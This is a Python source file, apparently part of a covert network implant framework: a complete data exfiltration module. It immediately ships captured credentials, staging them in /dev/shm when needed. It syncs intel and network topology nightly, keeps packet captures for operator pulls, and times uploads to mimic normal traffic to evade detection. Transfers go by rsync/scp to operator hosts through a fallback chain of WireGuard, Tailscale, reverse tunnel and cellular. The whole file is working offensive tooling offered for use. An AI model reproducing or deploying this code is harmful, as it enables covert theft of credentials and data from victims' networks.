#!/usr/bin/env python3 """Data exfiltration module — priority-based data transport. Manages data exfiltration through the connectivity chain with three priority tiers: IMMEDIATE: Credentials — pushed as captured via fastest available channel NIGHTLY: Intel summaries, topology updates — scheduled nightly sync ON_DEMAND: PCAPs — large files pulled by operator when needed Respects traffic_mimicry baseline — times transfers to match normal upload patterns so exfil activity blends with legitimate traffic. Falls back through connectivity chain: WireGuard -> Tailscale -> reverse_ssh -> cellular """ import json import logging import os import subprocess import threading import time from collections import deque from dataclasses import dataclass, field from enum import IntEnum from pathlib import Path from typing import Optional from modules.base import BaseModule from core.bus import Event logger = logging.getLogger("sensor.connectivity.data_exfil") class ExfilPriority(IntEnum): """Exfiltration priority levels.""" IMMEDIATE = 0 # Credentials — push now NIGHTLY = 1 # Intel/topology — batch nightly ON_DEMAND = 2 # PCAPs — operator pulls @dataclass class ExfilJob: """A pending exfiltration task.""" path: str priority: ExfilPriority created: float = field(default_factory=time.time) attempts: int = 0 last_attempt: float = 0 size_bytes: int = 0 description: str = "" # Connectivity chain — tried in order of preference CONNECTIVITY_CHAIN = ["wireguard", "tailscale", "reverse_tunnel", "cellular_backup"] NIGHTLY_HOUR = 2 # 2 AM local time for nightly sync MAX_ATTEMPTS = 5 RETRY_BACKOFF = 60 # seconds between retries class DataExfil(BaseModule): """Priority-based data exfiltration through the connectivity chain.""" name = "data_exfil" module_type = "connectivity" priority = -100 requires_root = False def __init__(self, bus, state, config, engine=None): super().__init__(bus, state, config, engine) self._immediate_queue: deque = deque(maxlen=1000) self._nightly_queue: deque = deque(maxlen=500) self._on_demand_queue: deque = deque(maxlen=200) self._worker_thread: Optional[threading.Thread] = None self._nightly_thread: Optional[threading.Thread] = None self._lock = threading.Lock() self._stats = { "files_sent": 0, "bytes_sent": 0, "creds_pushed": 0, "nightly_syncs": 0, "failures": 0, } self._remote_base: Optional[str] = None self._remote_user: Optional[str] = None self._ssh_key: Optional[str] = None # ------------------------------------------------------------------ # BaseModule interface # ------------------------------------------------------------------ def start(self) -> None: if self._running: return exfil_cfg = self.config.get("connectivity", {}).get("data_exfil", {}) self._remote_base = exfil_cfg.get("remote_base", "/data/exfil") self._remote_user = exfil_cfg.get("remote_user", "operator") self._ssh_key = exfil_cfg.get("ssh_key") # Subscribe to credential events for immediate push self.bus.subscribe(self._on_credential_found, event_type="CREDENTIAL_FOUND") # Start worker thread for processing queues self._running = True self._pid = os.getpid() self._start_time = time.time() self._worker_thread = threading.Thread( target=self._worker_loop, daemon=True, name="sensor-exfil-worker", ) self._worker_thread.start() # Start nightly sync scheduler self._nightly_thread = threading.Thread( target=self._nightly_scheduler, daemon=True, name="sensor-exfil-nightly", ) self._nightly_thread.start() self.state.set_module_status(self.name, "running", pid=self._pid) logger.info("Data exfil module active") def stop(self) -> None: if not self._running: return self._running = False self.bus.unsubscribe(self._on_credential_found, event_type="CREDENTIAL_FOUND") if self._worker_thread and self._worker_thread.is_alive(): self._worker_thread.join(timeout=5.0) if self._nightly_thread and self._nightly_thread.is_alive(): self._nightly_thread.join(timeout=5.0) self.state.set_module_status(self.name, "stopped") logger.info("Data exfil stopped (sent=%d, bytes=%d, failures=%d)", self._stats["files_sent"], self._stats["bytes_sent"], self._stats["failures"]) def status(self) -> dict: with self._lock: return { "running": self._running, "pid": self._pid, "uptime": time.time() - self._start_time if self._start_time else 0, "queue_immediate": len(self._immediate_queue), "queue_nightly": len(self._nightly_queue), "queue_on_demand": len(self._on_demand_queue), "stats": dict(self._stats), } def configure(self, config: dict) -> None: self.config.update(config) def health_check(self) -> bool: if not self._running: return False return self._worker_thread is not None and self._worker_thread.is_alive() # ------------------------------------------------------------------ # Public API # ------------------------------------------------------------------ def push_file(self, path: str, priority: int = ExfilPriority.NIGHTLY, description: str = "") -> bool: """Queue a file for exfiltration at the given priority.""" if not os.path.isfile(path): logger.warning("Exfil target does not exist: %s", path) return False try: size = os.path.getsize(path) except OSError: size = 0 job = ExfilJob( path=path, priority=ExfilPriority(priority), size_bytes=size, description=description, ) with self._lock: if priority == ExfilPriority.IMMEDIATE: self._immediate_queue.append(job) elif priority == ExfilPriority.NIGHTLY: self._nightly_queue.append(job) else: self._on_demand_queue.append(job) logger.debug("Queued for exfil (%s): %s (%d bytes)", ExfilPriority(priority).name, path, size) return True def sync_intel(self) -> bool: """Trigger an immediate sync of all queued intel/nightly data.""" logger.info("Manual intel sync triggered") return self._process_nightly_queue() def get_exfil_stats(self) -> dict: """Return exfil statistics.""" with self._lock: return dict(self._stats) # ------------------------------------------------------------------ # Event handlers # ------------------------------------------------------------------ def _on_credential_found(self, event: Event) -> None: """Handle CREDENTIAL_FOUND events — push immediately.""" payload = event.payload cred_file = payload.get("file") cred_data = payload.get("data") if cred_file and os.path.isfile(cred_file): self.push_file(cred_file, ExfilPriority.IMMEDIATE, description=f"credential: {payload.get('type', 'unknown')}") elif cred_data: # Write credential data to a temp file for exfil tmpdir = "/dev/shm" if os.path.isdir("/dev/shm") else "/tmp" cred_path = os.path.join(tmpdir, f".cred_{int(time.time())}.json") try: fd = os.open(cred_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600) try: os.write(fd, json.dumps(cred_data).encode()) finally: os.close(fd) self.push_file(cred_path, ExfilPriority.IMMEDIATE, description="credential_data") except OSError as exc: logger.error("Failed to write credential for exfil: %s", exc) with self._lock: self._stats["creds_pushed"] += 1 # ------------------------------------------------------------------ # Worker threads # ------------------------------------------------------------------ def _worker_loop(self) -> None: """Main worker: drain immediate queue, respecting traffic mimicry.""" while self._running: # Process immediate queue first job = None with self._lock: if self._immediate_queue: job = self._immediate_queue.popleft() if job: self._process_job(job) else: time.sleep(5.0) def _nightly_scheduler(self) -> None: """Wait until NIGHTLY_HOUR and trigger nightly sync.""" while self._running: now = time.localtime() if now.tm_hour == NIGHTLY_HOUR and now.tm_min < 5: # Check traffic mimicry — is this a normal upload time? if self._is_upload_window(): self._process_nightly_queue() with self._lock: self._stats["nightly_syncs"] += 1 # Sleep past the window to avoid re-triggering time.sleep(3600) continue time.sleep(60) def _process_job(self, job: ExfilJob) -> bool: """Transfer a single file through the connectivity chain.""" job.attempts += 1 job.last_attempt = time.time() # Try each connectivity method in order for conn_name in CONNECTIVITY_CHAIN: conn_status = self.state.get_module_status(conn_name) if conn_status.get("status") != "running": continue if self._transfer_file(job.path, conn_name): with self._lock: self._stats["files_sent"] += 1 self._stats["bytes_sent"] += job.size_bytes logger.info("Exfil success: %s via %s (%d bytes)", job.path, conn_name, job.size_bytes) # Clean up temp credential files after successful send if job.path.startswith(("/dev/shm/", "/tmp/")) and ".cred_" in job.path: try: os.unlink(job.path) except OSError: pass return True # All channels failed — re-queue if under max attempts with self._lock: self._stats["failures"] += 1 if job.attempts < MAX_ATTEMPTS: logger.warning("Exfil failed for %s (attempt %d/%d), re-queuing", job.path, job.attempts, MAX_ATTEMPTS) time.sleep(RETRY_BACKOFF) with self._lock: if job.priority == ExfilPriority.IMMEDIATE: self._immediate_queue.append(job) else: self._nightly_queue.append(job) else: logger.error("Exfil permanently failed for %s after %d attempts", job.path, MAX_ATTEMPTS) return False def _process_nightly_queue(self) -> bool: """Process all items in the nightly queue.""" success = True while self._running: with self._lock: if not self._nightly_queue: break job = self._nightly_queue.popleft() if not self._process_job(job): success = False # Brief pause between files to avoid traffic bursts time.sleep(2.0) return success # ------------------------------------------------------------------ # Transfer methods # ------------------------------------------------------------------ def _transfer_file(self, local_path: str, via_module: str) -> bool: """Transfer a file using rsync/scp over the specified connectivity module.""" if not os.path.isfile(local_path): return False # Determine remote target based on connectivity module remote_host = self._get_remote_host(via_module) if not remote_host: return False remote_path = f"{self._remote_user}@{remote_host}:{self._remote_base}/" # Build SSH options — use known_hosts for host key verification exfil_cfg = self.config.get("connectivity", {}).get("data_exfil", {}) ssh_opts = [ "-o", "StrictHostKeyChecking=accept-new", # Accept only if not seen before "-o", "LogLevel=ERROR", "-o", "ConnectTimeout=10", ] # Use operator-provided known_hosts if available, else fail known_hosts = exfil_cfg.get("ssh_known_hosts_file") if known_hosts: if not os.path.isfile(known_hosts): raise FileNotFoundError(f"SSH known_hosts file not found: {known_hosts}") ssh_opts.extend(["-o", f"UserKnownHostsFile={known_hosts}"]) else: # Fallback: require known_hosts to prevent MITM logger.error("SSH known_hosts not configured — exfil disabled for MITM protection") return False if self._ssh_key: ssh_opts.extend(["-i", self._ssh_key]) # Try rsync first (delta transfer, bandwidth efficient) if self._try_rsync(local_path, remote_path, ssh_opts): return True # Fallback to scp return self._try_scp(local_path, remote_path, ssh_opts) def _try_rsync(self, local_path: str, remote_path: str, ssh_opts: list) -> bool: """Attempt file transfer via rsync.""" ssh_cmd = "ssh " + " ".join(ssh_opts) cmd = [ "rsync", "-az", "--timeout=30", "-e", ssh_cmd, local_path, remote_path, ] try: result = subprocess.run( cmd, capture_output=True, timeout=120, ) return result.returncode == 0 except (subprocess.TimeoutExpired, FileNotFoundError): return False def _try_scp(self, local_path: str, remote_path: str, ssh_opts: list) -> bool: """Attempt file transfer via scp.""" cmd = ["scp", "-q"] + ssh_opts + [local_path, remote_path] try: result = subprocess.run( cmd, capture_output=True, timeout=120, ) return result.returncode == 0 except (subprocess.TimeoutExpired, FileNotFoundError): return False def _get_remote_host(self, via_module: str) -> Optional[str]: """Get the remote host address for a connectivity module.""" if via_module == "wireguard": wg_cfg = self.config.get("connectivity", {}).get("wireguard", {}) # Use the WireGuard peer's allowed IP (operator side) allowed = wg_cfg.get("allowed_ips", "") if "/" in allowed: return allowed.split("/")[0] return allowed if allowed else None elif via_module == "tailscale": # Get Tailscale IP of the operator machine from config ts_cfg = self.config.get("connectivity", {}).get("tailscale", {}) return ts_cfg.get("operator_ip") elif via_module == "reverse_tunnel": # Reverse tunnel goes through localhost (port is forwarded) return "127.0.0.1" elif via_module == "cellular_backup": # Cellular uses a separate relay cell_cfg = self.config.get("connectivity", {}).get("cellular", {}) return cell_cfg.get("exfil_host") return None # ------------------------------------------------------------------ # Traffic mimicry integration # ------------------------------------------------------------------ def _is_upload_window(self) -> bool: """Check if current time falls within a normal upload window. Reads the traffic mimicry baseline to determine if now is a reasonable time for upload activity. """ baseline = self.state.get("traffic_mimicry", "upload_hours", default=None) if not baseline: # No baseline — allow all hours return True try: if isinstance(baseline, str): allowed_hours = json.loads(baseline) else: allowed_hours = baseline current_hour = time.localtime().tm_hour return current_hour in allowed_hours except (json.JSONDecodeError, TypeError): return True